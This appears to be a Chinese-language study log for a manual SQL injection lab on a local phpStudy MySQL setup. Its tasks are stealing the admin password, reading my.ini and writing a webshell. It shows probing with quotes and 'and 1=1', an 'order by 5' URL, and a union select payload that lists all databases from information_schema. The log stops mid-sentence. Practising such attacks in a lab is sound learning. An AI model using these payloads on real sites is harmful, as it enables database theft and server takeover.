这是今天的任务
任务三个 : 第一个手工注入找出admin用户的密码,第二个读取我phpstudy中mysql的my.ini这个配置文件的内容,第三个是通过这个注入点写入一个webshell, 都是要求手工,具体方法自己百度mysql5注入相关内容
union select 1,2,3,4,5
查询语句 第一步是先构造闭合 加入单引号报错 然后 更据and 1=1 and1=2看是字符型还是布尔型注入
http://www.萨达所大大所多t/index.php?id=1%20order%20by%205
数据库test
查询所有数据库
网址+union select 1,2,3,4,schema_name from information_schema.schemata
要求是读取web端口的admin密码 那我们应该进入test数据库<